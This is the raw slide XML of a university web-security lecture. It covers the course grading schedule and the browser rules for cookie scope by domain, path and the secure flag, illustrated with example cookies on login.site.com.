            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>TP4: 		20/12/15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Project: 	12/01/15</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Final Grade = ⅖ (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Σ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>=1..4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>¼  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>TP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="-25000" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Grande"/>
                <a:ea typeface="Lucida Grande"/>
                <a:cs typeface="Lucida Grande"/>
              </a:rPr>
              <a:t>⅗ Project</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" baseline="-25000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66725" y="5523111"/>
            <a:ext cx="9135428" cy="630453"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0" anchor="ctr">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="1013704" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4400" kern="1200" spc="-11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Course </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>material</a:t>
            </a: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569944" y="6820111"/>
            <a:ext cx="8891660" cy="1987446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="101370" tIns="50685" rIns="101370" bIns="50685" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="202741" indent="-202741" algn="l" defTabSz="1013704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6852" indent="-202741" algn="l" defTabSz="1013704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963" indent="-202741" algn="l" defTabSz="1013704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5074" indent="-202741" algn="l" defTabSz="101370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7815" indent="-152056" algn="l" defTabSz="1013704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0556" indent="-202741" algn="l" defTabSz="101370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23297" indent="-202741" algn="l" defTabSz="101370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6037" indent="-202741" algn="l" defTabSz="101370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28778" indent="-202741" algn="l" defTabSz="101370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fr-FR" sz="2000" smtClean="0"/>
              <a:t>http://www-sop.inria.fr/members/Tamara.Rezk/teaching/paris6/material.tar.gz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6547944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 dirty="0" smtClean="0"/>
              <a:t>Cookies are identified by  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" err="1" smtClean="0"/>
              <a:t>name,domain,path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r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761286" y="6071871"/>
            <a:ext cx="8627904" cy="118064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Both cookies stored in browser’s cookie jar;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="887"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		both are in scope of   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login.site.com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0573" y="2106532"/>
            <a:ext cx="4061545" cy="25953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lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" u="sng" dirty="0"/>
              <a:t>cookie 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" b="1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US" sz="2700" dirty="0"/>
              <a:t>value = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>secure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89391" y="2106532"/>
            <a:ext cx="3234395" cy="25953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lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" u="sng" dirty="0"/>
              <a:t>cookie 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" b="1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US" sz="2700" dirty="0"/>
              <a:t>value = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>test123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" b="1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US" sz="2700" dirty="0"/>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7174" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4639966" y="5054622"/>
            <a:ext cx="2551516" cy="517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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>distinct cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7175" name="Freeform 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3402877" y="4734865"/>
            <a:ext cx="1363970" cy="643028"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1221853 w 1229710"/>
              <a:gd name="T1" fmla="*/ 554300 h 580696"/>
              <a:gd name="T2" fmla="*/ 360289 w 1229710"/>
              <a:gd name="T3" fmla="*/ 490950 h 580696"/>
              <a:gd name="T4" fmla="*/ 0 w 1229710"/>
              <a:gd name="T5" fmla="*/ 0 h 580696"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 1229710"/>
              <a:gd name="T10" fmla="*/ 0 h 580696"/>
              <a:gd name="T11" fmla="*/ 1229710 w 1229710"/>
              <a:gd name="T12" fmla="*/ 580696 h 5806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29710" h="580696">
                <a:moveTo>
                  <a:pt x="1229710" y="551793"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="898634" y="566244"/>
                  <a:pt x="567558" y="580696"/>
                  <a:pt x="362606" y="488731"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="157654" y="396766"/>
                  <a:pt x="78827" y="198383"/>
                  <a:pt x="0" y="0"/>
                </a:cubicBezTo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lIns="101370" tIns="50685" rIns="101370" bIns="50685"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7176" name="Freeform 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7026033" y="4734865"/>
            <a:ext cx="926936" cy="593835"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 835572"/>
              <a:gd name="T1" fmla="*/ 540420 h 536028"/>
              <a:gd name="T2" fmla="*/ 690058 w 835572"/>
              <a:gd name="T3" fmla="*/ 413261 h 536028"/>
              <a:gd name="T4" fmla="*/ 831206 w 835572"/>
              <a:gd name="T5" fmla="*/ 0 h 536028"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 835572"/>
              <a:gd name="T10" fmla="*/ 0 h 536028"/>
              <a:gd name="T11" fmla="*/ 835572 w 835572"/>
              <a:gd name="T12" fmla="*/ 536028 h 5360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35572" h="536028">
                <a:moveTo>
                  <a:pt x="0" y="536028"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="277210" y="517634"/>
                  <a:pt x="554420" y="499241"/>
                  <a:pt x="693682" y="409903"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="832944" y="320565"/>
                  <a:pt x="834258" y="160282"/>
                  <a:pt x="835572" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="381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lIns="101370" tIns="50685" rIns="101370" bIns="5068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9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cookies on server   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(read SOP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195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761286" y="3963582"/>
            <a:ext cx="9389189" cy="286727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dirty="0" smtClean="0"/>
              <a:t>Browser sends all cookies in URL scope:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie-domain is domain-suffix of URL-domain, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie-path is prefix of URL-path, and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[protocol=HTTPS  if cookie is “secure”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Goal:   server only sees cookies in its scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1330"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0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184222" y="2023957"/>
            <a:ext cx="1691746" cy="1349305"/>
            <a:chOff x="1066800" y="1828800"/>
            <a:chExt cx="1524000" cy="1219200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1447800" y="1828800"/>
              <a:ext cx="1128713" cy="838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" name="AutoShape 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1547813" y="1928813"/>
              <a:ext cx="914400" cy="609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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="808000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t>Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="AutoShape 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1066800" y="2667000"/>
              <a:ext cx="1524000" cy="228600"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 16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1066800" y="2895600"/>
              <a:ext cx="11430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9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2190750" y="2662238"/>
              <a:ext cx="400050" cy="385762"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="0" y="243"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="252" y="81"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="249" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="147"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="243"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="252" h="243">
                  <a:moveTo>
                    <a:pt x="0" y="243"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="252" y="81"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="243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9" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7528269" y="1939625"/>
            <a:ext cx="1353397" cy="1407283"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 2607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1370" tIns="50685" rIns="101370" bIns="50685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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r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3214317" y="2361283"/>
            <a:ext cx="3278318" cy="711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370" tIns="50685" rIns="101370" bIns="50685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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET  //URL-domain/URL-path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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Cookie:  NAME = VALUE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8199" name="Straight Arrow Connector 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2875968" y="2275196"/>
            <a:ext cx="4652301" cy="175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684787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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147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253762" y="5059892"/>
            <a:ext cx="4229365" cy="1855294"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1109"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4561667" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>http://checkout.site.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1109"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4561667" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>http://login.site.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1109"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4561667" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>https://login.site.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="4561667" algn="l"/>
              </a:tabLst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99636" y="1855294"/>
            <a:ext cx="4061545" cy="25953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lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" u="sng" dirty="0"/>
              <a:t>cookie 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" b="1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US" sz="2700" dirty="0"/>
              <a:t>value = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>u1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>secure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8454" y="1855294"/>
            <a:ext cx="3234395" cy="25953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lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" u="sng" dirty="0"/>
              <a:t>cookie 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>name = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" b="1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US" sz="2700" dirty="0"/>
              <a:t>value = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>domain = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>site.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2700" b="1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US" sz="2700" dirty="0"/>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>non-secure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9222" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3806429" y="1264973"/>
            <a:ext cx="3077301" cy="37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370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>both set by   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>login.site.com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21476" y="5059892"/>
            <a:ext cx="5013729" cy="1630984"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="101370" tIns="50685" rIns="101370" bIns="50685">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1109"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1109"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
